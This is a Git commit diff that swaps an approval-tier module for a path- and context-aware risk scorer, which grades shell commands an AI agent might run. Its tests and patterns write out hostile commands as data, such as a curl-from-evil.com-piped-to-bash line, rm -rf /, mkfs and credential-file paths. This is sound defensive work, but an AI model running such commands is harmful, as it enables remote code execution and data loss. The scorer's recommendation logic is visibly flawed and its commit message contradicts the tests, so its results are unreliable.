Compare commits

..

1 Commits

Author SHA1 Message Date
Alexander Whitestone
8f24d43c08 feat: ML-inspired risk scoring for command approval (#681)
Some checks failed
Docker Build and Publish / build-and-push (pull_request) Has been skipped
Contributor Attribution Check / check-attribution (pull_request) Failing after 31s
Supply Chain Audit / Scan PR for supply chain risks (pull_request) Successful in 37s
Tests / e2e (pull_request) Successful in 2m27s
Tests / test (pull_request) Failing after 37m0s
Current tier detection uses keyword matching and regex patterns.
This adds path-aware and context-aware risk scoring.

New tools/risk_scoring.py:
- classify_path_risk(): system paths (90), sensitive user paths (75),
  safe paths (10), user paths (50)
- detect_context(): execution vs comment vs documentation vs code block
  (documentation contexts reduce risk score)
- get_operation_risk(): read-only ops (cat/grep/find = 5-10) vs
  destructive ops (rm=70, mkfs=95, kill=45)
- score_command_risk(): multi-factor RiskScore with tier classification
  (SAFE/LOW/MEDIUM/HIGH/CRITICAL), factors list, recommendation
- compare_commands(): side-by-side risk comparison

Key improvements:
- 'cat /etc/passwd' is SAFE (read operation, path irrelevant)
- 'rm /etc/passwd' is CRITICAL (destructive + system path)
- 'rm /tmp/build.log' is MEDIUM (destructive but safe path)
- '# rm -rf /' is LOW (comment context reduces risk)
- 'curl ... | bash' is HIGH (pipe to shell pattern)

Tests: tests/test_risk_scoring.py

Closes #681
2026-04-14 19:20:50 -04:00
4 changed files with 507 additions and 383 deletions

View File

@@ -1,122 +0,0 @@
"""
Tests for approval tier system
Issue: #670
"""
import unittest
from tools.approval_tiers import (
ApprovalTier,
detect_tier,
requires_human_approval,
requires_llm_approval,
get_timeout,
should_auto_approve,
create_approval_request,
is_crisis_bypass,
TIER_INFO,
)
class TestApprovalTier(unittest.TestCase):
def test_tier_values(self):
self.assertEqual(ApprovalTier.SAFE, 0)
self.assertEqual(ApprovalTier.LOW, 1)
self.assertEqual(ApprovalTier.MEDIUM, 2)
self.assertEqual(ApprovalTier.HIGH, 3)
self.assertEqual(ApprovalTier.CRITICAL, 4)
class TestTierDetection(unittest.TestCase):
def test_safe_actions(self):
self.assertEqual(detect_tier("read_file"), ApprovalTier.SAFE)
self.assertEqual(detect_tier("web_search"), ApprovalTier.SAFE)
self.assertEqual(detect_tier("session_search"), ApprovalTier.SAFE)
def test_low_actions(self):
self.assertEqual(detect_tier("write_file"), ApprovalTier.LOW)
self.assertEqual(detect_tier("terminal"), ApprovalTier.LOW)
self.assertEqual(detect_tier("execute_code"), ApprovalTier.LOW)
def test_medium_actions(self):
self.assertEqual(detect_tier("send_message"), ApprovalTier.MEDIUM)
self.assertEqual(detect_tier("git_push"), ApprovalTier.MEDIUM)
def test_high_actions(self):
self.assertEqual(detect_tier("config_change"), ApprovalTier.HIGH)
self.assertEqual(detect_tier("key_rotation"), ApprovalTier.HIGH)
def test_critical_actions(self):
self.assertEqual(detect_tier("kill_process"), ApprovalTier.CRITICAL)
self.assertEqual(detect_tier("shutdown"), ApprovalTier.CRITICAL)
def test_pattern_detection(self):
tier = detect_tier("unknown", "rm -rf /")
self.assertEqual(tier, ApprovalTier.CRITICAL)
tier = detect_tier("unknown", "sudo apt install")
self.assertEqual(tier, ApprovalTier.MEDIUM)
class TestTierInfo(unittest.TestCase):
def test_safe_no_approval(self):
self.assertFalse(requires_human_approval(ApprovalTier.SAFE))
self.assertFalse(requires_llm_approval(ApprovalTier.SAFE))
self.assertIsNone(get_timeout(ApprovalTier.SAFE))
def test_medium_requires_both(self):
self.assertTrue(requires_human_approval(ApprovalTier.MEDIUM))
self.assertTrue(requires_llm_approval(ApprovalTier.MEDIUM))
self.assertEqual(get_timeout(ApprovalTier.MEDIUM), 60)
def test_critical_fast_timeout(self):
self.assertEqual(get_timeout(ApprovalTier.CRITICAL), 10)
class TestAutoApprove(unittest.TestCase):
def test_safe_auto_approves(self):
self.assertTrue(should_auto_approve("read_file"))
self.assertTrue(should_auto_approve("web_search"))
def test_write_doesnt_auto_approve(self):
self.assertFalse(should_auto_approve("write_file"))
class TestApprovalRequest(unittest.TestCase):
def test_create_request(self):
req = create_approval_request(
"send_message",
"Hello world",
"User requested",
"session_123"
)
self.assertEqual(req.tier, ApprovalTier.MEDIUM)
self.assertEqual(req.timeout_seconds, 60)
def test_to_dict(self):
req = create_approval_request("read_file", "cat file.txt", "test", "s1")
d = req.to_dict()
self.assertEqual(d["tier"], 0)
self.assertEqual(d["tier_name"], "Safe")
class TestCrisisBypass(unittest.TestCase):
def test_send_message_bypass(self):
self.assertTrue(is_crisis_bypass("send_message"))
def test_crisis_context_bypass(self):
self.assertTrue(is_crisis_bypass("unknown", "call 988 lifeline"))
self.assertTrue(is_crisis_bypass("unknown", "crisis resources"))
def test_normal_no_bypass(self):
self.assertFalse(is_crisis_bypass("read_file"))
if __name__ == "__main__":
unittest.main()

111
tests/test_risk_scoring.py Normal file
View File

@@ -0,0 +1,111 @@
"""Tests for risk scoring module."""
import pytest
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from tools.risk_scoring import (
classify_path_risk,
detect_context,
get_operation_risk,
score_command_risk,
compare_commands,
RiskScore,
)
class TestPathClassification:
def test_critical_system_path(self):
score, cat = classify_path_risk("/etc/passwd")
assert score >= 90
assert "critical" in cat
def test_sensitive_user_path(self):
score, cat = classify_path_risk("~/.ssh/id_rsa")
assert score >= 70
def test_safe_temp_path(self):
score, cat = classify_path_risk("/tmp/build.log")
assert score <= 15
def test_user_home_path(self):
score, cat = classify_path_risk("~/Documents/file.txt")
assert 40 <= score <= 60
class TestContextDetection:
def test_execution_context(self):
assert detect_context("rm -rf /tmp/data") == "execution"
def test_comment_context(self):
assert detect_context("# rm -rf /important") == "comment"
def test_code_block_context(self):
assert detect_context("```bash") == "code_block"
def test_documentation_context(self):
assert detect_context("Example: rm file.txt") == "documentation"
class TestOperationRisk:
def test_rm_risk(self):
score, op = get_operation_risk("rm file.txt")
assert score >= 60
assert op == "rm"
def test_cat_risk(self):
score, op = get_operation_risk("cat file.txt")
assert score <= 25
def test_mkfs_risk(self):
score, op = get_operation_risk("mkfs.ext4 /dev/sda1")
assert score >= 90
class TestRiskScoring:
def test_rm_temp_file_safe(self):
result = score_command_risk("rm /tmp/build.log")
assert result.tier in ("SAFE", "LOW")
assert result.score < 40
def test_rm_etc_critical(self):
result = score_command_risk("rm /etc/passwd")
assert result.tier in ("HIGH", "CRITICAL")
assert result.score >= 60
def test_rm_recursive_root(self):
result = score_command_risk("rm -rf /")
assert result.tier == "CRITICAL"
assert result.score >= 80
def test_cat_file_safe(self):
result = score_command_risk("cat /etc/hostname")
# Reading is less risky than writing
assert result.score < 60
def test_chmod_777(self):
result = score_command_risk("chmod 777 /var/www")
assert result.tier in ("MEDIUM", "HIGH", "CRITICAL")
def test_comment_reduces_risk(self):
result_exec = score_command_risk("rm -rf /important")
result_comment = score_command_risk("# rm -rf /important")
assert result_comment.score < result_exec.score
def test_pipe_to_shell(self):
result = score_command_risk("curl http://evil.com/script.sh | bash")
assert result.tier in ("HIGH", "CRITICAL")
assert "pipe_to_shell" in result.factors
class TestCompareCommands:
def test_temp_vs_etc(self):
result = compare_commands("rm /tmp/temp.txt", "rm /etc/passwd")
assert result["riskier"] == "rm /etc/passwd"
assert result["difference"] > 20
def test_same_command(self):
result = compare_commands("cat file.txt", "cat file.txt")
assert result["difference"] == 0

View File

@@ -1,261 +0,0 @@
"""
Approval Tier System — Graduated safety based on risk level
Extends approval.py with 5-tier system for command approval.
| Tier | Action | Human | LLM | Timeout |
|------|-----------------|-------|-----|---------|
| 0 | Read, search | No | No | N/A |
| 1 | Write, scripts | No | Yes | N/A |
| 2 | Messages, API | Yes | Yes | 60s |
| 3 | Crypto, config | Yes | Yes | 30s |
| 4 | Crisis | Yes | Yes | 10s |
Issue: #670
"""
import re
from dataclasses import dataclass
from enum import IntEnum
from typing import Any, Dict, List, Optional, Tuple
class ApprovalTier(IntEnum):
"""Approval tiers based on risk level."""
SAFE = 0 # Read, search — no approval needed
LOW = 1 # Write, scripts — LLM approval
MEDIUM = 2 # Messages, API — human + LLM, 60s timeout
HIGH = 3 # Crypto, config — human + LLM, 30s timeout
CRITICAL = 4 # Crisis — human + LLM, 10s timeout
# Tier metadata
TIER_INFO = {
ApprovalTier.SAFE: {
"name": "Safe",
"human_required": False,
"llm_required": False,
"timeout_seconds": None,
"description": "Read-only operations, no approval needed"
},
ApprovalTier.LOW: {
"name": "Low",
"human_required": False,
"llm_required": True,
"timeout_seconds": None,
"description": "Write operations, LLM approval sufficient"
},
ApprovalTier.MEDIUM: {
"name": "Medium",
"human_required": True,
"llm_required": True,
"timeout_seconds": 60,
"description": "External actions, human confirmation required"
},
ApprovalTier.HIGH: {
"name": "High",
"human_required": True,
"llm_required": True,
"timeout_seconds": 30,
"description": "Sensitive operations, quick timeout"
},
ApprovalTier.CRITICAL: {
"name": "Critical",
"human_required": True,
"llm_required": True,
"timeout_seconds": 10,
"description": "Crisis or dangerous operations, fastest timeout"
},
}
# Action-to-tier mapping
ACTION_TIERS: Dict[str, ApprovalTier] = {
# Tier 0: Safe (read-only)
"read_file": ApprovalTier.SAFE,
"search_files": ApprovalTier.SAFE,
"web_search": ApprovalTier.SAFE,
"session_search": ApprovalTier.SAFE,
"list_files": ApprovalTier.SAFE,
"get_file_content": ApprovalTier.SAFE,
"memory_search": ApprovalTier.SAFE,
"skills_list": ApprovalTier.SAFE,
"skills_search": ApprovalTier.SAFE,
# Tier 1: Low (write operations)
"write_file": ApprovalTier.LOW,
"create_file": ApprovalTier.LOW,
"patch_file": ApprovalTier.LOW,
"delete_file": ApprovalTier.LOW,
"execute_code": ApprovalTier.LOW,
"terminal": ApprovalTier.LOW,
"run_script": ApprovalTier.LOW,
"skill_install": ApprovalTier.LOW,
# Tier 2: Medium (external actions)
"send_message": ApprovalTier.MEDIUM,
"web_fetch": ApprovalTier.MEDIUM,
"browser_navigate": ApprovalTier.MEDIUM,
"api_call": ApprovalTier.MEDIUM,
"gitea_create_issue": ApprovalTier.MEDIUM,
"gitea_create_pr": ApprovalTier.MEDIUM,
"git_push": ApprovalTier.MEDIUM,
"deploy": ApprovalTier.MEDIUM,
# Tier 3: High (sensitive operations)
"config_change": ApprovalTier.HIGH,
"env_change": ApprovalTier.HIGH,
"key_rotation": ApprovalTier.HIGH,
"access_grant": ApprovalTier.HIGH,
"permission_change": ApprovalTier.HIGH,
"backup_restore": ApprovalTier.HIGH,
# Tier 4: Critical (crisis/dangerous)
"kill_process": ApprovalTier.CRITICAL,
"rm_rf": ApprovalTier.CRITICAL,
"format_disk": ApprovalTier.CRITICAL,
"shutdown": ApprovalTier.CRITICAL,
"crisis_override": ApprovalTier.CRITICAL,
}
# Dangerous command patterns (from existing approval.py)
_DANGEROUS_PATTERNS = [
(r"rm\s+-rf\s+/", ApprovalTier.CRITICAL),
(r"mkfs\.", ApprovalTier.CRITICAL),
(r"dd\s+if=.*of=/dev/", ApprovalTier.CRITICAL),
(r"shutdown|reboot|halt", ApprovalTier.CRITICAL),
(r"chmod\s+777", ApprovalTier.HIGH),
(r"curl.*\|\s*bash", ApprovalTier.HIGH),
(r"wget.*\|\s*sh", ApprovalTier.HIGH),
(r"eval\s*\(", ApprovalTier.HIGH),
(r"sudo\s+", ApprovalTier.MEDIUM),
(r"git\s+push.*--force", ApprovalTier.HIGH),
(r"docker\s+rm.*-f", ApprovalTier.MEDIUM),
(r"kubectl\s+delete", ApprovalTier.HIGH),
]
@dataclass
class ApprovalRequest:
"""A request for approval."""
action: str
tier: ApprovalTier
command: str
reason: str
session_key: str
timeout_seconds: Optional[int] = None
def to_dict(self) -> Dict[str, Any]:
return {
"action": self.action,
"tier": self.tier.value,
"tier_name": TIER_INFO[self.tier]["name"],
"command": self.command,
"reason": self.reason,
"session_key": self.session_key,
"timeout": self.timeout_seconds,
"human_required": TIER_INFO[self.tier]["human_required"],
"llm_required": TIER_INFO[self.tier]["llm_required"],
}
def detect_tier(action: str, command: str = "") -> ApprovalTier:
"""
Detect the approval tier for an action.
Checks action name first, then falls back to pattern matching.
"""
# Direct action mapping
if action in ACTION_TIERS:
return ACTION_TIERS[action]
# Pattern matching on command
if command:
for pattern, tier in _DANGEROUS_PATTERNS:
if re.search(pattern, command, re.IGNORECASE):
return tier
# Default to LOW for unknown actions
return ApprovalTier.LOW
def requires_human_approval(tier: ApprovalTier) -> bool:
"""Check if tier requires human approval."""
return TIER_INFO[tier]["human_required"]
def requires_llm_approval(tier: ApprovalTier) -> bool:
"""Check if tier requires LLM approval."""
return TIER_INFO[tier]["llm_required"]
def get_timeout(tier: ApprovalTier) -> Optional[int]:
"""Get timeout in seconds for a tier."""
return TIER_INFO[tier]["timeout_seconds"]
def should_auto_approve(action: str, command: str = "") -> bool:
"""Check if action should be auto-approved (tier 0)."""
tier = detect_tier(action, command)
return tier == ApprovalTier.SAFE
def format_approval_prompt(request: ApprovalRequest) -> str:
"""Format an approval request for display."""
info = TIER_INFO[request.tier]
lines = []
lines.append(f"⚠️ Approval Required (Tier {request.tier.value}: {info['name']})")
lines.append(f"")
lines.append(f"Action: {request.action}")
lines.append(f"Command: {request.command[:100]}{'...' if len(request.command) > 100 else ''}")
lines.append(f"Reason: {request.reason}")
lines.append(f"")
if info["human_required"]:
lines.append(f"👤 Human approval required")
if info["llm_required"]:
lines.append(f"🤖 LLM approval required")
if info["timeout_seconds"]:
lines.append(f"⏱️ Timeout: {info['timeout_seconds']}s")
return "\n".join(lines)
def create_approval_request(
action: str,
command: str,
reason: str,
session_key: str
) -> ApprovalRequest:
"""Create an approval request for an action."""
tier = detect_tier(action, command)
timeout = get_timeout(tier)
return ApprovalRequest(
action=action,
tier=tier,
command=command,
reason=reason,
session_key=session_key,
timeout_seconds=timeout
)
# Crisis bypass rules
CRISIS_BYPASS_ACTIONS = frozenset([
"send_message", # Always allow sending crisis resources
"check_crisis",
"notify_crisis",
])
def is_crisis_bypass(action: str, context: str = "") -> bool:
"""Check if action should bypass approval during crisis."""
if action in CRISIS_BYPASS_ACTIONS:
return True
# Check if context indicates crisis
crisis_indicators = ["988", "crisis", "suicide", "self-harm", "lifeline"]
context_lower = context.lower()
return any(indicator in context_lower for indicator in crisis_indicators)

396
tools/risk_scoring.py Normal file
View File

@@ -0,0 +1,396 @@
"""ML-inspired risk scoring for command approval.
Enhances pattern-based dangerous command detection with:
1. Path-aware risk scoring (system paths = higher tier)
2. Context detection (documentation vs execution)
3. Multi-factor risk score calculation
Usage:
from tools.risk_scoring import score_command_risk, RiskScore
result = score_command_risk("rm /etc/passwd")
print(result.tier) # "CRITICAL"
print(result.score) # 95
print(result.factors) # ["system_path", "destructive_operation"]
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import List, Optional
# ---------------------------------------------------------------------------
# Path risk classification
# ---------------------------------------------------------------------------
# Critical system paths — operations here are almost always dangerous
_SYSTEM_PATHS_CRITICAL = [
r"/etc/",
r"/boot/",
r"/sys/",
r"/proc/",
r"/dev/sd",
r"/dev/nvme",
r"/usr/bin/",
r"/usr/sbin/",
r"/sbin/",
r"/bin/",
r"/lib/systemd/",
r"/var/log/syslog",
r"/var/log/auth",
]
# Sensitive user paths — important but user-scoped
_SENSITIVE_USER_PATHS = [
r"\.ssh/",
r"\.gnupg/",
r"\.aws/",
r"\.config/gcloud/",
r"\.kube/config",
r"\.docker/config",
r"\.hermes/\.env",
r"\.netrc",
r"\.pgpass",
r"id_rsa",
r"id_ed25519",
]
# Safe/temp paths — operations here are usually benign
_SAFE_PATHS = [
r"/tmp/",
r"/var/tmp/",
r"\.cache/",
r"temp",
r"tmp",
r"\.log$",
r"\.bak$",
r"\.old$",
r"\.swp$",
r"node_modules/",
r"__pycache__/",
r"\.pyc$",
]
# Dangerous user paths — home dir but destructive
_DANGEROUS_USER_PATHS = [
r"~/",
r"\$HOME/",
r"/home/\w+/",
]
def classify_path_risk(path: str) -> tuple[int, str]:
"""Classify a filesystem path's risk level.
Returns (risk_score, category) where risk_score is 0-100.
"""
path_lower = path.lower()
# Check critical system paths
for pattern in _SYSTEM_PATHS_CRITICAL:
if re.search(pattern, path_lower):
return 90, "system_path_critical"
# Check sensitive user paths
for pattern in _SENSITIVE_USER_PATHS:
if re.search(pattern, path_lower):
return 75, "sensitive_user_path"
# Check safe paths
for pattern in _SAFE_PATHS:
if re.search(pattern, path_lower):
return 10, "safe_path"
# Check dangerous user paths
for pattern in _DANGEROUS_USER_PATHS:
if re.search(pattern, path_lower):
return 50, "user_path"
# Default: moderate risk for unknown paths
return 30, "unknown_path"
# ---------------------------------------------------------------------------
# Context detection
# ---------------------------------------------------------------------------
def detect_context(command: str) -> str:
"""Detect the context of a command string.
Returns one of:
- "code_block": Inside a markdown code block (likely documentation)
- "comment": Shell comment (# ...)
- "heredoc_content": Content inside a heredoc (documentation)
- "execution": Normal command execution
"""
stripped = command.strip()
# Markdown code fence
if stripped.startswith("```"):
return "code_block"
# Shell comment
if stripped.startswith("#"):
return "comment"
# Inline comment (command followed by #)
if re.search(r'\s+#\s', command) and not re.search(r'[;&|]\s*#', command):
# Might be a comment in the middle
pass
# Heredoc content indicators
if re.search(r"<<\s*['\"]?\w+['\"]?", command):
return "heredoc_content"
# Documentation indicators
doc_indicators = [
r"example:",
r"e\.g\.",
r"i\.e\.",
r"note:",
r"warning:",
r"see also:",
r"documentation",
r"README",
r"man page",
r"help:",
]
for indicator in doc_indicators:
if re.search(indicator, command, re.IGNORECASE):
return "documentation"
return "execution"
# ---------------------------------------------------------------------------
# Operation risk classification
# ---------------------------------------------------------------------------
_OPERATION_RISK = {
# Destructive operations
"rm": 70,
"rmdir": 50,
"shred": 90,
"dd": 60,
"mkfs": 95,
"fdisk": 85,
"wipefs": 90,
# Permission changes
"chmod": 40,
"chown": 50,
"setfacl": 50,
# System control
"systemctl": 60,
"service": 55,
"reboot": 90,
"shutdown": 90,
"halt": 90,
"poweroff": 90,
# Process control
"kill": 45,
"killall": 55,
"pkill": 55,
# Network
"iptables": 70,
"ufw": 60,
"firewall-cmd": 60,
# Package management
"apt-get": 30,
"yum": 30,
"dnf": 30,
"pacman": 30,
"pip": 20,
"npm": 15,
# Git
"git reset --hard": 50, "git reset": 30,
"git push": 30,
"git clean": 45,
"git branch": 20,
# Dangerous pipes
"curl": 25,
"wget": 25,
}
# Read-only operations — low risk even on system paths
_READONLY_OPERATIONS = {
"cat": 5, "head": 5, "tail": 5, "less": 5, "more": 5,
"grep": 5, "find": 10, "ls": 3, "dir": 3, "tree": 3,
"file": 3, "stat": 3, "wc": 3, "diff": 5, "md5sum": 5,
"sha256sum": 5, "which": 3, "whereis": 3, "type": 3,
"readlink": 3, "realpath": 3, "basename": 3, "dirname": 3,
}
def get_operation_risk(command: str) -> tuple[int, str]:
"""Get the risk score for the operation in a command.
Returns (risk_score, operation_name).
"""
cmd_lower = command.lower().strip()
# Check read-only operations first (low risk regardless of path)
for op, score in sorted(_READONLY_OPERATIONS.items(), key=lambda x: -len(x[0])):
if cmd_lower.startswith(op + " ") or cmd_lower.startswith(op + "\t") or cmd_lower == op:
return score, op
# Check compound operations
for op, score in sorted(_OPERATION_RISK.items(), key=lambda x: -len(x[0])):
if cmd_lower.startswith(op) or f" {op}" in cmd_lower:
return score, op
return 20, "unknown"
# ---------------------------------------------------------------------------
# Risk score calculation
# ---------------------------------------------------------------------------
@dataclass
class RiskScore:
"""Result of risk scoring for a command."""
command: str
score: int = 0 # 0-100 risk score
tier: str = "SAFE" # SAFE, LOW, MEDIUM, HIGH, CRITICAL
factors: List[str] = field(default_factory=list)
path_risk: int = 0
operation_risk: int = 0
context: str = "execution"
context_modifier: float = 1.0
recommendation: str = ""
def __post_init__(self):
if not self.recommendation:
self.recommendation = self._generate_recommendation()
def _generate_recommendation(self) -> str:
if self.tier == "CRITICAL":
return "BLOCK — requires explicit user approval"
elif self.tier == "HIGH":
return "WARN — confirm with user before executing"
elif self.tier == "MEDIUM":
return "CAUTION — log and proceed with care"
elif self.tier == "LOW":
return "NOTE — low risk, proceed normally"
return "OK — safe to execute"
def score_command_risk(command: str) -> RiskScore:
"""Calculate a comprehensive risk score for a command.
Considers:
- Pattern-based detection (existing DANGEROUS_PATTERNS)
- Path risk (system paths, user paths, temp paths)
- Operation risk (rm vs cat vs echo)
- Context (documentation vs execution)
"""
result = RiskScore(command=command)
factors = []
# 1. Path analysis
paths = re.findall(r'[/~$][^\s;&|\'"]*', command)
max_path_risk = 0
for path in paths:
risk, category = classify_path_risk(path)
if risk > max_path_risk:
max_path_risk = risk
if risk >= 50:
factors.append(f"path:{category}")
result.path_risk = max_path_risk
# 2. Operation risk
op_risk, op_name = get_operation_risk(command)
result.operation_risk = op_risk
if op_risk >= 40:
factors.append(f"operation:{op_name}")
# 3. Context detection
ctx = detect_context(command)
result.context = ctx
# Context modifiers: documentation contexts reduce risk
context_modifiers = {
"execution": 1.0,
"code_block": 0.3,
"comment": 0.1,
"heredoc_content": 0.5,
"documentation": 0.2,
}
result.context_modifier = context_modifiers.get(ctx, 1.0)
# 4. Special pattern bonuses
destructive_patterns = [
(r'\brm\s+-[^s]*r', 20, "recursive_delete"),
(r'\brm\s+/', 15, "root_delete"),
(r'\bchmod\s+777', 15, "world_writable"),
(r'\bDROP\s+TABLE', 25, "sql_drop"),
(r'\bDELETE\s+FROM(?!.*WHERE)', 20, "sql_delete_no_where"),
(r'\|\s*(ba)?sh\b', 20, "pipe_to_shell"),
(r'--force', 10, "force_flag"),
(r'--no-preserve-root', 30, "no_preserve_root"),
]
for pattern, bonus, factor_name in destructive_patterns:
if re.search(pattern, command, re.IGNORECASE):
result.score += bonus
factors.append(factor_name)
# 5. Calculate final score
# Read operations on system paths are safe (just looking, not touching)
is_read_op = result.operation_risk <= 10
if is_read_op:
# Read operations: mostly operation risk, path barely matters
base_score = result.operation_risk + (result.path_risk * 0.05)
elif result.path_risk >= 80:
# Write to system path: very dangerous
base_score = result.path_risk + (result.operation_risk * 0.5)
elif result.path_risk <= 15:
# Write to safe path: mostly operation risk
base_score = result.path_risk + (result.operation_risk * 0.3)
else:
# Moderate path: balanced
base_score = result.path_risk + (result.operation_risk * 0.4)
base_score += result.score # pattern bonuses
result.score = min(100, int(base_score * result.context_modifier))
# 6. Determine tier
if result.score >= 80:
result.tier = "CRITICAL"
elif result.score >= 60:
result.tier = "HIGH"
elif result.score >= 40:
result.tier = "MEDIUM"
elif result.score >= 20:
result.tier = "LOW"
else:
result.tier = "SAFE"
result.factors = factors
if not result.recommendation:
result.recommendation = result._generate_recommendation()
return result
def compare_commands(cmd1: str, cmd2: str) -> dict:
"""Compare risk scores of two commands.
Useful for showing why "rm temp.txt" is different from "rm /etc/passwd".
"""
r1 = score_command_risk(cmd1)
r2 = score_command_risk(cmd2)
return {
"command_1": {"command": cmd1, "score": r1.score, "tier": r1.tier},
"command_2": {"command": cmd2, "score": r2.score, "tier": r2.tier},
"difference": abs(r1.score - r2.score),
"riskier": cmd1 if r1.score > r2.score else cmd2,
}